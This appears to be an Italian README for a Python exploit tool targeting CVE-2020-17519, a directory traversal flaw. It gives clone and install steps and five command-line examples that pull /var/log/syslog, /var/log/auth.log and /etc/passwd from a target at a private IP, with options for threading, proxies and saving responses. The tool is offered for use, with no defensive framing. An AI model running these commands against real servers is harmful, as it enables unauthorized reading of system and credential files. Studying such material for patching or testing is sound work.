
Uno strumento Python che utilizza una tecnica di directory traversal per richiedere file di log da un URL di destinazione. Mostra l'avanzamento in tempo reale, supporta la configurazione del proxy e, opzionalmente, salva le risposte valide.
requests e pwntools (pwn)argparse, os, concurrent.futures, threadinggit clone https://github.com/GazettEl/CVE-2020-17519.git
pip install requests pwntools
Lo strumento può essere eseguito dalla riga di comando con diverse opzioni. Di seguito sono riportati alcuni esempi:
Esempio 1: Richiedi un Singolo Percorso di File
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-path /var/log/syslog --threads 1 --save
Esempio 2: Richiedi Più Percorsi di File da un Elenco
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-list file_paths.txt --threads 4 --proxy none
Esempio 3: Esecuzione con Proxy Disattivato
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 10 --file-path /var/log/auth.log --threads 2 --proxy none
Esempio 4: Utilizza un Elenco di File e Salva le Risposte Valide
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 15 --file-list paths.txt --threads 4 --save
Esempio 5: Richiedi un Singolo File con Profondità Aumentata
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 20 --file-path /etc/passwd --threads 1
Per maggiori dettagli, fare riferimento al codice sorgente e ai commenti interni.